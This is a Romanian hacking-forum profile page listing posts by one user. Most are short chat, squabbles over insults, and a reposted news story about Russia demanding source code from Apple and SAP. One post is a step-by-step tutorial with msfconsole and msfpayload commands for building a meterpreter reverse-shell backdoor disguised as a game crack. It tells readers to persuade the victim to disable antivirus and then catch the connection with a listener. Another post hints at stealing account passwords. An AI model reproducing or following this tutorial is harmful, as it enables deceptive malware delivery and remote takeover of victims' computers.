Jump to content

Cyb3rGhost

Active Members
  • Posts

    432
  • Joined

  • Last visited

Everything posted by Cyb3rGhost

  1. Interesant...
  2. ha ha ha
  3. Vai de site-ul ala )
  4. Interesant......
  5. Bine ai venit!
  6. Probabil se tem ca o sa piarda "razboiul" informatic si vor fi spionati...... nu?
  7. Just few days after the announcement that Russian government will pay almost 4 million ruble (approximately equal to $111,000) to the one who can devise a reliable technology to decrypt data sent over the Tor, now the government wants something which is really tough. APPLE & SAP, HAND OVER YOUR SOURCE CODES Russian government has asked Apple to provide the access to the company’s source code in an effort to assure its iOS devices and Macintoshes aren’t vulnerable to spying. Not just this, the government has demanded the same from SAP as well, which is an enterprise software that manages business operations and customer relationships. Russia proposed this idea last Tuesday when Communications Minister Nikolai Nikiforov met SAP’s Russian managing director Vyacheslav Orekhov, and Apple’s Russian general manager Peter Engrob Nielsen, and suggested that both the companies give Russian government access to their source code. APPLE iOS BACKDOOR CONTROVERSIES The idea came just a week after a security researcher Jonathan Zdziarski accused Apple of building surveillance backdoors into iOS devices to help government spy on Apple users, though Apple denies the claim saying, it “has never worked with any government agency from any country to create a backdoor in any of our products or services.” Russia also expressed too much of concerns about the NSA surveillance program leak by former NSA contractor Edward Snowden. Since after the NSA leak, foreign experts and security researchers believe that U.S. government-backed software encryption standards that help the U.S. intelligence agency NSA to spy on people quite effortlessly. "Edward Snowden's revelations in 2013 and U.S. intelligence services' public statements about the strengthening of surveillance of Russia in 2014 have raised a serious question of trust in foreign software and hardware," Nikiforov said in the statement released late on Tuesday by Reuters. “It is obvious that those companies that disclose the source codes of their programs are not hiding anything, but those who do not intend to cooperate with Russia in this regard may have products with undeclared capabilities in their products,” he added. noting that Microsoft has been releasing its source code since 2003. RUSSIA PREFERRED SAMSUNG OVER APPLE SMARTPHONES It’s not the only example that shows Russian government is wary about US-made tech products. Last March, Russian government banned the Members of its cabinet from using iPads and suggested them to use Samsung tablets instead, the Moscow Times reports. Placed a competition, when Russian government wants to crack Tor anonymizing network, an encrypted anonymizing network used by online users in order to hide their activities from law enforcement, government censors, and others. But, what the government will do now? When it wants the access to the source code of a company who never provided it. Source : The Hacker News - Breaking News, Cyber Security, Hacking News
  8. Folositor wapmaster13
  9. Aiurea cu LIKE-urile astea "cumparate"
  10. Nu e vorba sa invat eu chestiile elementare hat.me insa ma gandeam ca poate cuiva o sa-i prinda bine. Dupa cum am mai zis, cine vrea citeste si alte chestii si cine nu vrea poate sa treaca mai departe. Si legat de treaba cu semnele de punctuatie si alte treburi de genul asta, nu cred ca trebuie cineva de aici sa ma educe chiar daca are intentii bune....
  11. Eu zic asa, decat sa continuam cu circul asta care nu foloseste nimanui mai bine la POST-urile mele sau unde comentez cui nu-i convine ce spun sa nu ma mai bage in seama. Accept critici normal insa in limita bunului simt ca asa e corect nu sa ne luam peste picior pt ca nimanui nu-i convine situatia asta. Si cineva care jigneste prin treaba asta nu dovedeste inteligenta ci mai de graba CRETINISM. Si nu am batut niciun apropo prin asta ci am spus asa in general.....
  12. danyweb09....folosesc cum vreau semnele de punctuatie....nu trebuie sa ma inveti.....chiar nu am nevoie.....si nici nu stiu de ce se face atata caz pe seama POST-ului asta..... pana la urma cine vrea intra se uita si comenteaza, insa nu sa ne jignim unii pe altii
  13. SynTAX...nu ma milogesc...nu fac asta insa eu nu am jignit pe nimeni si cred ca am dreptul sa nu fiu jignit sau luat la misto pt ca nici eu nu am luat peste picior pe nimeni..iar legat de pasul 4.....hmmmm...cum sa explic mai pe scurt?.....setam localhost-ul......adica asta inlesneste legatura creata intre PC-ul meu de exemplu si al victimei.......IP-ul ala e un fel de punte creata intre mine si victima sa zic asa....IP-ul este puntea si portul 8080 este stalpul ce sustine puntea ....nu prea ma pricep sa explic dar cred ca ai inteles ideea.... Si Castiel mai usor cu injuratul.....calm ca eu nu ti-am zis nimic....
  14. In primul rand nu sunt Hacker si nu ma consider unul...il al doilea rand nu cred ar trebui sa ma caracterizeze cineva....eu nu am jignit pe nimeni si nici nu am de gand asa ca nu vrea ca cineva sa mai imi vorbeasca aiurea..nu sunt eu cine stie ce insa am dreptul sa nu imi vorbeasca nimeni urat...vorba aceea... Daca vrei respect Ofera resspect...nu zic asta ca sa ma dau inteligent insa totusi.....Si NU...nu e luat de pe YouTube.........nu cred ca cineva poate intui sau nu cunostintele cuiva....daca cineva e mai bine pregatit decat altul DA dar nu cred ca o anumita persoana o poate caracteriza pe alta.....
  15. calm Nest calm..... P.S : In cazul asta folosesti doar localhost
  16. bcman asta a fost doar ca exemplu...cine face asa ceva isi poate da seama...deci...
  17. Informatiile primite in acest tutorial sunt pur informative! Sunteti total resposabili de cum folositi ce ati vazut aici. In primul rand ca sa nu se prinda victima trebuie sa-i spuneti ca este un crack pentru un joc sau asa ceva si trebuie sa isi dezactiveze antivirusul pt ca o sa fie o alarma falsa ...vedeti voi ca sunteti baieti destepti. Eu ma voi folosi de o distributie linux...dar gata cu vorbaria si la treaba! Pasul 1: Deschidem un terminal si apoi scriem: msfconsole Pasul 2: Ne vom folosi de : use multi/handler Pasul 3: Acum alegem calea unde sa se salveze backdoor-ul nostru, eu voi folosi asa : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 x > /root/Desktop/fifa07crack.exe Unde 192.168.1.2 este ip-ul vostru! Si 8080 portul... Pasul 4 : Setam LHOST cu IP-ul nostru! : set LHOST 192.168.1.2 Pasul 5 : Setam portul : set LPORT 8080 Pasul 6 : "Scriem comanda" : exploit Si cam atat a fost...acum nu va ramane decat sa asteptati ca victima sa dea deschida executabilul de la voi!
  18. Castiel..... De ce injuri? sa stii ca nu dovedesti nimic prin asta..... daca am zis ce am zis nu am dat cu parul....fiecare avem dreptul la o parere insa nici sa ne injuram nu e OK.....
  19. Si totusi nu pare sa fie chestie de maintenanta...ar fi trebuit sa apara ceva in sensul asta...voi ce parere aveti?
  20. Da dar sunt de parere ca ai fost putin cam prea radical in ceea ce ai spus... Keep Kalm man
  21. AGSQ...nu cred ca are rost sa te agiti atat. Fiecare cu parerile si cunostintele sale...
  22. Chestia asta ca sa cumperi LIKE-uri pe facebook mi se pare o mare prostie sincer sa fiu.... Trebuie sa fi si putin obsedat sa faci asa ceva
  23. Flood-ul mi se pare o chestie aiurea...daca esti intradevar bun ii iei direct db si gata
  24. Cu placere...si in legatura cu parolele conturilor..un mic pont.... "Sesiunile de logare apoi un mic refresh"
×
×
  • Create New...